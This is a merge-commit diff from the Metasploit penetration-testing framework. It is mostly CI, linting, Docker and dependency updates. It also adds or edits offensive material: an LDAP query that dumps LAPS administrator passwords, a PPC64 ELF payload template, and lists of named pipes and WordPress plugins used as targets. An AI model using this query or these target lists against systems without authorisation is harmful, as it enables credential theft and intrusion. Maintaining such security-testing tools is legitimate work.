Merge pull request #20353 from cgranleese-r7/add-validation-for-arch-values

Add validation for arch values
Updates incorrect arch values in modules
2025-06-25 17:13:01 +01:00 · 2025-06-25 16:57:27 +01:00 · 2025-06-25 16:57:23 +01:00 · 2025-06-25 15:39:59 +01:00 · 2025-06-25 14:19:56 +01:00 · 2025-06-25 14:19:43 +01:00
3495 changed files with 150292 additions and 118572 deletions
@@ -63,21 +63,23 @@ jobs:
      fail-fast: false
      matrix:
        os:
-          - windows-2019
+          - windows-2022
          - ubuntu-latest
        ruby:
-          - '3.2'
+          - '3.4'
        include:
          # Powershell
-          - { command_shell: { name: powershell }, os: windows-2019 }
-          - { command_shell: { name: powershell }, os: windows-2022 }
+          - { command_shell: { name: powershell }, ruby: '3.4', os: windows-2022 }
+          - { command_shell: { name: powershell }, ruby: '3.4', os: windows-2025 }

          # Linux
-          - { command_shell: { name: linux }, os: ubuntu-latest }
+          - { command_shell: { name: linux }, ruby: '3.4', os: ubuntu-latest }

          # CMD
-          - { command_shell: { name: cmd }, os: windows-2019 }
-          - { command_shell: { name: cmd }, os: windows-2022 }
+          - { command_shell: { name: cmd }, ruby: '3.4', os: windows-2022 }
+
+          # TODO: Tests currently fail:
+          # - { command_shell: { name: cmd }, ruby: '3.4', os: windows-2025 }

    runs-on: ${{ matrix.os }}

@@ -131,10 +133,11 @@ jobs:
        if: runner.os == 'Windows'
        run: git config --system core.longpaths true

-      - name: Setup Ruby
-        env:
-          BUNDLE_FORCE_RUBY_PLATFORM: true
-        uses: ruby/setup-ruby@v1
+      - name: Setup '${{ matrix.ruby }}' Ruby
+        # Skip for now to ensure CI passes on Windows server 2025 powershell tests
+        #env:
+        #  BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@eaecf785f6a34567a6d97f686bbb7bccc1ac1e5c
        with:
          ruby-version: ${{ matrix.ruby }}
          bundler-cache: true
@@ -191,7 +194,8 @@ jobs:
          BUNDLE_FORCE_RUBY_PLATFORM: true
        uses: ruby/setup-ruby@v1
        with:
-          ruby-version: '${{ matrix.ruby }}'
+          # use the default version from the .ruby-version file
+          ruby-version: '.ruby-version'
          bundler-cache: true
          cache-version: 4

@@ -33,6 +33,8 @@ on:
      - 'metsploit-framework.gemspec'
      - 'Gemfile.lock'
      - '**/**ldap**'
+      - 'lib/metasploit/framework/tcp/**'
+      - 'lib/metasploit/framework/login_scanner/**'
      - 'spec/acceptance/**'
      - 'spec/support/acceptance/**'
      - 'spec/acceptance_spec_helper.rb'
@@ -33,6 +33,8 @@ on:
      - 'metsploit-framework.gemspec'
      - 'Gemfile.lock'
      - '**/**postgres**'
+      - 'lib/metasploit/framework/tcp/**'
+      - 'lib/metasploit/framework/login_scanner/**'
      - 'spec/acceptance/**'
      - 'spec/support/acceptance/**'
      - 'spec/acceptance_spec_helper.rb'
@@ -26,11 +26,11 @@ jobs:
          - '3.3'
          - '3.4'
        os:
-          - ubuntu-20.04
          - ubuntu-22.04
          - ubuntu-24.04
          - ubuntu-latest
-          - windows-2019
+          - windows-2022
+          - windows-2025
          - macos-13

    env:
@@ -68,10 +68,10 @@ jobs:
      matrix:
        os:
          - macos-13
-          - windows-2019
+          - windows-2022
          - ubuntu-latest
        ruby:
-          - '3.2'
+          - '3.4'
        meterpreter:
          # Python
          - { name: python, runtime_version: 3.8 }
@@ -87,8 +87,9 @@ jobs:
          - { name: php, runtime_version: 8.3 }
        include:
          # Windows Meterpreter
-          - { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
-          - { meterpreter: { name: windows_meterpreter }, os: windows-2022 }
+          - { meterpreter: { name: windows_meterpreter }, ruby: '3.4', os: windows-2022 }
+          # TODO: Screenshotting behavior fails:
+          # - { meterpreter: { name: windows_meterpreter }, ruby: '3.4', os: windows-2025 }

          # Mettle
          - { meterpreter: { name: mettle }, os: macos-13 }
@@ -200,7 +201,8 @@ jobs:
          BUNDLE_FORCE_RUBY_PLATFORM: true
          # Required for macos13 pg gem compilation
          PKG_CONFIG_PATH: "/usr/local/opt/libpq/lib/pkgconfig"
-        uses: ruby/setup-ruby@v1
+        # Pinned to avoid Windows compilation failure with nokogiri
+        uses: ruby/setup-ruby@eaecf785f6a34567a6d97f686bbb7bccc1ac1e5c
        with:
          ruby-version: ${{ matrix.ruby }}
          bundler-cache: true
@@ -274,6 +276,15 @@ jobs:
          make.bat
        working-directory: metasploit-payloads

+      - name: Build Windows payloads via Visual Studio 2025 Build (Windows)
+        shell: cmd
+        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2025' && inputs.build_metasploit_payloads }}
+        run: |
+          cd c/meterpreter
+          git submodule init && git submodule update
+          make.bat
+        working-directory: metasploit-payloads
+
      - name: Get metasploit-payloads version
        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
        shell: bash
@@ -358,7 +369,7 @@ jobs:
        if: always()
        env:
          BUNDLE_FORCE_RUBY_PLATFORM: true
-        uses: ruby/setup-ruby@v1
+        uses: ruby/setup-ruby@eaecf785f6a34567a6d97f686bbb7bccc1ac1e5c
        with:
          ruby-version: '3.3'
          bundler-cache: true
@@ -23,12 +23,10 @@ require:
  - ./lib/rubocop/cop/lint/deprecated_gem_version.rb
  - ./lib/rubocop/cop/lint/module_enforce_notes.rb
  - ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb
+  - ./lib/rubocop/cop/lint/detect_metadata_trailing_leading_whitespace.rb

 Layout/SpaceBeforeBrackets:
-  Description: >-
-    Disabled as it generates invalid code:
-      https://github.com/rubocop-hq/rubocop/issues/9499
-  Enabled: false
+  Enabled: true

 Lint/AmbiguousAssignment:
  Enabled: true
@@ -116,6 +114,12 @@ Style/DocumentDynamicEvalDefinition:
 Style/EndlessMethod:
  Enabled: true

+Style/FormatStringToken:
+  Enabled: true
+  Exclude:
+  # We aren't ready to enable this for modules yet
+    - 'modules/**/*'
+
 Style/HashExcept:
  Enabled: true

@@ -155,9 +159,26 @@ Style/RedundantAssignment:
    and return expression
  Enabled: false

+Style/RedundantParentheses:
+  Description: >-
+    Disabled as it sometimes improves the readability of code
+  Enabled: false
+
+Style/RedundantRegexpArgument:
+  Enabled: true
+  Exclude:
+  # We aren't ready to enable this for modules yet
+    - 'modules/**/*'
+
 Style/SwapValues:
  Enabled: false

+Layout/LineContinuationLeadingSpace:
+  Description: >-
+    Disabled as it sometimes improves the readability of code having leading spaces
+    for indented code strings.
+  Enabled: false
+
 Layout/ModuleHashOnNewLine:
  Enabled: true

@@ -652,3 +673,6 @@ Style/UnpackFirst:
    Disabling to make it easier to copy/paste `unpack('h*')` expressions from code
    into a debugging REPL.
  Enabled: false
+
+Lint/DetectMetadataTrailingLeadingWhitespace:
+  Enabled: true
@@ -1 +1 @@
-3.2.5
+3.2.8
@@ -1,4 +1,4 @@
-FROM ruby:3.2.5-alpine3.20 AS builder
+FROM ruby:3.2.8-alpine3.21 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_CONFIG_ARGS="set force_ruby_platform 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
@@ -24,6 +24,7 @@ RUN apk add --no-cache \
      readline-dev \
      sqlite-dev \
      postgresql-dev \
+      libffi-dev \
      libpcap-dev \
      libxml2-dev \
      libxslt-dev \
@@ -47,13 +48,13 @@ RUN apk add --no-cache \
 ENV GO111MODULE=off
 RUN mkdir -p $TOOLS_HOME/bin && \
    cd $TOOLS_HOME/bin && \
-    curl -O https://dl.google.com/go/go1.21.1.src.tar.gz && \
-    tar -zxf go1.21.1.src.tar.gz && \
-    rm go1.21.1.src.tar.gz && \
+    curl -O https://dl.google.com/go/go1.24.0.src.tar.gz && \
+    tar -zxf go1.24.0.src.tar.gz && \
+    rm go1.24.0.src.tar.gz && \
    cd go/src && \
    ./make.bash

-FROM ruby:3.2.5-alpine3.20
+FROM ruby:3.2.8-alpine3.21
 LABEL maintainer="Rapid7"
 ARG TARGETARCH

@@ -24,7 +24,7 @@ group :development do
  # memory profiling
  gem 'memory_profiler'
  # cpu profiling
-  gem 'ruby-prof', '1.4.2'
+  gem 'ruby-prof'
  # Metasploit::Aggregator external session proxy
  # disabled during 2.5 transition until aggregator is available
  # gem 'metasploit-aggregator'
@@ -37,8 +37,8 @@ group :development, :test do
  # environment is development
  gem 'rspec-rails'
  gem 'rspec-rerun'
-  # Required during CI as well local development - pinned due to CI failure on: rubocop-1.73.2/lib/rubocop/config_loader.rb:272:in `read'
-  gem 'rubocop', '1.67.0'
+  # Required during CI as well local development
+  gem 'rubocop', '1.75.7'
 end

 group :test do
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.60)
+    metasploit-framework (6.4.71)
      aarch64
      abbrev
      actionpack (~> 7.1.0)
@@ -45,9 +45,9 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.189)
+      metasploit-payloads (= 2.0.221)
      metasploit_data_models (>= 6.0.7)
-      metasploit_payloads-mettle (= 1.0.35)
+      metasploit_payloads-mettle (= 1.0.42)
      mqtt
      msgpack (~> 1.6.0)
      mutex_m
@@ -97,7 +97,7 @@ PATH
      rinda
      ruby-macho
      ruby-mysql
-      ruby_smb (~> 3.3.3)
+      ruby_smb (~> 3.3.15)
      rubyntlm
      rubyzip
      sinatra
@@ -170,7 +170,7 @@ GEM
      rspec-expectations (~> 3.12)
    arel-helpers (2.16.0)
      activerecord (>= 3.1.0, < 8.1)
-    ast (2.4.2)
+    ast (2.4.3)
    aws-eventstream (1.3.2)
    aws-partitions (1.1065.0)
    aws-sdk-core (3.220.1)
@@ -293,7 +293,8 @@ GEM
    jsobfu (0.4.2)
      rkelly-remix
    json (2.10.2)
-    language_server-protocol (3.17.0.4)
+    language_server-protocol (3.17.0.5)
+    lint_roller (1.1.0)
    little-plugger (1.1.4)
    logger (1.6.6)
    logging (2.4.0)
@@ -309,10 +310,14 @@ GEM
      activesupport (~> 7.0)
      railties (~> 7.0)
      zeitwerk
-    metasploit-credential (6.0.14)
+    metasploit-credential (6.0.16)
+      bigdecimal
+      csv
+      drb
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
+      mutex_m
      net-ssh
      pg
      railties
@@ -323,7 +328,7 @@ GEM
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
-    metasploit-payloads (2.0.189)
+    metasploit-payloads (2.0.221)
    metasploit_data_models (6.0.9)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
@@ -334,7 +339,7 @@ GEM
      railties (~> 7.0)
      recog
      webrick
-    metasploit_payloads-mettle (1.0.35)
+    metasploit_payloads-mettle (1.0.42)
    method_source (1.1.0)
    mime-types (3.6.0)
      logger
@@ -377,8 +382,8 @@ GEM
    ostruct (0.6.1)
    packetfu (2.0.0)
      pcaprub (~> 0.13.1)
-    parallel (1.26.3)
-    parser (3.3.7.1)
+    parallel (1.27.0)
+    parser (3.3.8.0)
      ast (~> 2.4.1)
      racc
    patch_finder (1.0.2)
@@ -390,6 +395,7 @@ GEM
      ruby-rc4
      ttfunk
    pg (1.5.9)
+    prism (1.4.0)
    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
@@ -446,7 +452,7 @@ GEM
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.33)
+    rex-core (0.1.34)
    rex-encoder (0.1.8)
      metasm
      rex-arch
@@ -469,22 +475,24 @@ GEM
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.15)
+    rex-random_identifier (0.1.16)
+      bigdecimal
      rex-text
    rex-registry (0.1.6)
    rex-rop_builder (0.1.6)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.60)
+    rex-socket (0.1.62)
      dnsruby
      rex-core
-    rex-sslscan (0.1.11)
+    rex-sslscan (0.1.13)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.5)
-    rex-text (0.2.60)
+    rex-text (0.2.61)
+      bigdecimal
    rex-zip (0.1.6)
      rex-text
    rexml (3.4.1)
@@ -516,25 +524,27 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.13.2)
-    rubocop (1.67.0)
+    rubocop (1.75.7)
      json (~> 2.3)
-      language_server-protocol (>= 3.17.0)
+      language_server-protocol (~> 3.17.0.2)
+      lint_roller (~> 1.1.0)
      parallel (~> 1.10)
      parser (>= 3.3.0.2)
      rainbow (>= 2.2.2, < 4.0)
-      regexp_parser (>= 2.4, < 3.0)
-      rubocop-ast (>= 1.32.2, < 2.0)
+      regexp_parser (>= 2.9.3, < 3.0)
+      rubocop-ast (>= 1.44.0, < 2.0)
      ruby-progressbar (~> 1.7)
-      unicode-display_width (>= 2.4.0, < 3.0)
-    rubocop-ast (1.38.1)
-      parser (>= 3.3.1.0)
+      unicode-display_width (>= 2.4.0, < 4.0)
+    rubocop-ast (1.44.1)
+      parser (>= 3.3.7.2)
+      prism (~> 1.4)
    ruby-macho (4.1.0)
    ruby-mysql (4.2.0)
-    ruby-prof (1.4.2)
+    ruby-prof (1.7.1)
    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.3.13)
+    ruby_smb (3.3.15)
      bindata (= 2.4.15)
      openssl-ccm
      openssl-cmac
@@ -577,7 +587,9 @@ GEM
      concurrent-ruby (~> 1.0)
    tzinfo-data (1.2025.1)
      tzinfo (>= 1.0.0)
-    unicode-display_width (2.6.0)
+    unicode-display_width (3.1.4)
+      unicode-emoji (~> 4.0, >= 4.0.4)
+    unicode-emoji (4.0.4)
    unix-crypt (1.3.1)
    warden (1.2.9)
      rack (>= 2.0.9)
@@ -622,8 +634,8 @@ DEPENDENCIES
  redcarpet
  rspec-rails
  rspec-rerun
-  rubocop (= 1.67.0)
-  ruby-prof (= 1.4.2)
+  rubocop (= 1.75.7)
+  ruby-prof
  simplecov (= 0.18.2)
  test-prof
  timecop
@@ -12,7 +12,7 @@ afm, 0.2.2, MIT
 allure-rspec, 2.26.0, "Apache 2.0"
 allure-ruby-commons, 2.26.0, "Apache 2.0"
 arel-helpers, 2.16.0, MIT
-ast, 2.4.2, MIT
+ast, 2.4.3, MIT
 aws-eventstream, 1.3.2, "Apache 2.0"
 aws-partitions, 1.1065.0, "Apache 2.0"
 aws-sdk-core, 3.220.1, "Apache 2.0"
@@ -83,7 +83,8 @@ irb, 1.7.4, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
 json, 2.10.2, ruby
-language_server-protocol, 3.17.0.4, MIT
+language_server-protocol, 3.17.0.5, MIT
+lint_roller, 1.1.0, MIT
 little-plugger, 1.1.4, MIT
 logger, 1.6.6, "ruby, Simplified BSD"
 logging, 2.4.0, MIT
@@ -91,10 +92,10 @@ loofah, 2.24.0, MIT
 memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.4, "New BSD"
-metasploit-credential, 6.0.14, "New BSD"
-metasploit-framework, 6.4.60, "New BSD"
+metasploit-credential, 6.0.16, "New BSD"
+metasploit-framework, 6.4.71, "New BSD"
 metasploit-model, 5.0.3, "New BSD"
-metasploit-payloads, 2.0.189, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.221, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.9, "New BSD"
 metasploit_payloads-mettle, 1.0.35, "3-clause (or ""modified"") BSD"
 method_source, 1.1.0, MIT
@@ -125,12 +126,13 @@ openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 ostruct, 0.6.1, "ruby, Simplified BSD"
 packetfu, 2.0.0, "New BSD"
-parallel, 1.26.3, MIT
-parser, 3.3.7.1, MIT
+parallel, 1.27.0, MIT
+parser, 3.3.8.0, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.3, LGPL-2.1
 pdf-reader, 2.14.1, MIT
 pg, 1.5.9, "Simplified BSD"
+prism, 1.4.0, MIT
 pry, 0.14.2, MIT
 pry-byebug, 3.10.1, MIT
 public_suffix, 6.0.1, MIT
@@ -155,7 +157,7 @@ reline, 0.6.0, ruby
 require_all, 3.0.0, MIT
 rex-arch, 0.1.18, "New BSD"
 rex-bin_tools, 0.1.10, "New BSD"
-rex-core, 0.1.33, "New BSD"
+rex-core, 0.1.34, "New BSD"
 rex-encoder, 0.1.8, "New BSD"
 rex-exploitation, 0.1.41, "New BSD"
 rex-java, 0.1.8, "New BSD"
@@ -163,13 +165,13 @@ rex-mime, 0.1.11, "New BSD"
 rex-nop, 0.1.4, "New BSD"
 rex-ole, 0.1.9, "New BSD"
 rex-powershell, 0.1.101, "New BSD"
-rex-random_identifier, 0.1.15, "New BSD"
+rex-random_identifier, 0.1.16, "New BSD"
 rex-registry, 0.1.6, "New BSD"
 rex-rop_builder, 0.1.6, "New BSD"
-rex-socket, 0.1.60, "New BSD"
-rex-sslscan, 0.1.11, "New BSD"
+rex-socket, 0.1.62, "New BSD"
+rex-sslscan, 0.1.13, "New BSD"
 rex-struct2, 0.1.5, "New BSD"
-rex-text, 0.2.60, "New BSD"
+rex-text, 0.2.61, "New BSD"
 rex-zip, 0.1.6, "New BSD"
 rexml, 3.4.1, "Simplified BSD"
 rinda, 0.2.0, "ruby, Simplified BSD"
@@ -181,15 +183,15 @@ rspec-mocks, 3.13.2, MIT
 rspec-rails, 7.1.1, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.13.2, MIT
-rubocop, 1.67.0, MIT
-rubocop-ast, 1.38.1, MIT
+rubocop, 1.75.7, MIT
+rubocop-ast, 1.44.1, MIT
 ruby-macho, 4.1.0, MIT
 ruby-mysql, 4.2.0, MIT
-ruby-prof, 1.4.2, "Simplified BSD"
+ruby-prof, 1.7.1, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.3.13, "New BSD"
+ruby_smb, 3.3.15, "New BSD"
 rubyntlm, 0.6.5, MIT
 rubyzip, 2.4.1, "Simplified BSD"
 sawyer, 0.9.2, MIT
@@ -211,7 +213,8 @@ timeout, 0.4.3, "ruby, Simplified BSD"
 ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
 tzinfo, 2.0.6, MIT
 tzinfo-data, 1.2025.1, MIT
-unicode-display_width, 2.6.0, MIT
+unicode-display_width, 3.1.4, MIT
+unicode-emoji, 4.0.4, MIT
 unix-crypt, 1.3.1, 0BSD
 warden, 1.2.9, MIT
 webrick, 1.9.1, "ruby, Simplified BSD"
@@ -249,7 +249,7 @@ queries:
      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
  - action: ENUM_LAPS_PASSWORDS
-    description: 'Dump info about computers that have LAPS enabled, and passwords for them if available.'
+    description: 'Dump info about computers that have LAPS v1 enabled, and passwords for them if available.'
    filter: '(ms-MCS-AdmPwd=*)'
    attributes:
      - cn
@@ -395,4 +395,4 @@ queries:
      - dNSHostname
      - msSMSSiteCode
    references:
-      - https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/RECON/RECON-1/recon-1_description.md
+      - https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/RECON/RECON-1/recon-1_description.md
@@ -185,19 +185,19 @@ class SnifferSMB < BaseProtocolParser
              report_note(
                :host  => src_ip,
                :type  => "smb_peer_os",
-                :data  => s[:peer_os]
+                :data  => { :peer_os => s[:peer_os] }
              ) if (s[:peer_os] and s[:peer_os].strip.length > 0)

              report_note(
                :host  => src_ip,
                :type  => "smb_peer_lm",
-                :data  => s[:peer_lm]
+                :data  => { :peer_lm => s[:peer_lm] }
              ) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)

              report_note(
                :host  => src_ip,
                :type  => "smb_domain",
-                :data  => s[:domain]
+                :data  => { :domain => s[:domain] }
              ) if (s[:domain] and s[:domain].strip.length > 0)

            end
@@ -67,6 +67,8 @@
 <% description = "Module may cause a noise (Examples: audio output from the speakers or hardware beeps)." %>
 <% elsif side_effect == "physical-effects" %>
 <% description = "Module may produce physical effects (Examples: the device makes movement or flashes LEDs)." %>
+<% elsif side_effect == "unknown-side-effects" %>
+<% description = "Module side effects are unknown." %>
 <% end %>

 * **<%= side_effect %>:** <%= description %>
@@ -85,6 +87,8 @@
 <% description = "The module isn't expected to get a shell reliably (such as only once)." %>
 <% elsif reliability == "event-dependent" %>
 <% description = "The module may not execute the payload until an external event occurs. For instance, a cron job, machine restart, user interaction within a GUI element, etc." %>
+<% elsif reliability == "unknown-reliability" %>
+<% description = "Module reliability is unknown." %>
 <% end %>

 * **<%= reliability %>:** <%= description %>
@@ -109,6 +113,8 @@
 <% description = "Module may cause a resource (such as a file or data in a database) to be unavailable for the service." %>
 <% elsif stability == "os-resource-loss" %>
 <% description = "Modules may cause a resource (such as a file) to be unavailable for the OS." %>
+<% elsif stability == "unknown-stability" %>
+<% description = "Module stability is unknown." %>
 <% end %>

 * **<%= stability %>:** <%= description %>
@@ -0,0 +1,35 @@
+BITS 64
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 2, 2, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    0x0200                   ;   e_type       = ET_EXEC for an executable
+  dw    0x1500                   ;   e_machine    = PPC64
+  dd    0x01000000                        ;   e_version
+  dq    0x7810000000000000      ;   e_entry
+  dq    0x4000000000000000       ;   e_phoff
+  dq    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    0x4000                   ;   e_ehsize
+  dw    0x3800                   ;   e_phentsize
+  dw    0x0100                   ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+
+  dd    0x01000000               ;   p_type       = pt_load
+  dd    0x07000000               ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    0x0010000000000000       ;   p_vaddr
+  dq    0x0010000000000000                       ;   p_paddr
+  dq    0xefbeadde       ;   p_filesz
+  dq    0xefbeadde       ;   p_memsz
+  dq    0x0000100000000000      ;   p_align
+
+phdrsize equ  $ - phdr
+
+_start:
+dq      0x8010000000000000
@@ -23,3 +23,4 @@ W32TIME_ALT
 wkssvc
 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
 db2remotecmd
+CxUIUSvcChannel
@@ -8,6 +8,7 @@ bulletproof-security
 catch-themes-demo-import
 chopslider
 custom-registration-form-builder-with-submission-manager
+depicter
 download-manager
 drag-and-drop-multiple-file-upload-contact-form-7
 dukapress
@@ -26,7 +27,6 @@ learnpress
 loginizer
 masterstudy-lms-learning-management-system
 modern-events-calendar-lite
-modern-events-calendar-lite
 nextgen-gallery
 ninja-forms
 paid-memberships-pro
@@ -45,7 +45,11 @@ simple-file-list
 slideshow-gallery
 sp-client-document-manager
 subscribe-to-comments
+suretriggers
+tatsu
 ultimate-member
+user-registration
+user-registration-pro
 website-contact-form-with-file-upload
 woocommerce-abandoned-cart
 woocommerce-payments
@@ -53,18 +57,17 @@ wordpress-mobile-pack
 wordpress-popular-posts
 work-the-flow-file-upload
 wp-automatic
+wpdiscuz
 wp-easycart
 wp-fastest-cache
 wp-file-manager
 wp-gdpr-compliance
 wp-mobile-detector
 wp-mobile-edition
-wp-symposium
-wp-symposium
-wp-time-capsule
-wp-ultimate-csv-importer
-wpdiscuz
 wps-hide-login
 wpshop
+wp-symposium
+wp-time-capsule
 wptouch
+wp-ultimate-csv-importer
 wysija-newsletters
@@ -85,7 +85,7 @@ Additionally any information about caveats, scenarios you have tested, custom op
 should also go into this file.

 ## Checking Documentation Syntax
-Once you have written the documentation, you then want to run `toos/dev/msftidy_docs.rb <path to documentation file>`. This will report on any
+Once you have written the documentation, you then want to run `tools/dev/msftidy_docs.rb <path to documentation file>`. This will report on any
 errors with your documentation file, which you will want to fix before submitting your PR. Notice however that if you get a warning about long lines,
 these may be okay to ignore depending on the context. A good example is if a line is long merely because of a URL. Such warnings can be
 safely ignored.
@@ -10,28 +10,38 @@ Updates are released about once every other week for Windows and Linux.

 The pgp signatures below can be verified with the following [public key](https://pgp.mit.edu/pks/lookup?op=get&search=0xCDFB5FA52007B954)

-|Download Link|File Type|SHA1|PGP|
-|-|-|-|-|
-| [metasploit-4.22.2-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
-| [metasploit-4.22.2-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
-| [metasploit-4.22.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.asc)|
-| [metasploit-4.22.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.asc)|
-| [metasploit-4.22.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.asc)|
-| [metasploit-4.22.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.asc)|
-| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.asc)|
-| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.asc)|
-| [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.asc)|
-| [metasploit-4.21.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.asc)|
-| [metasploit-4.20.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.asc)|
-| [metasploit-4.20.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.asc)|
-| [metasploit-4.19.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.asc)|
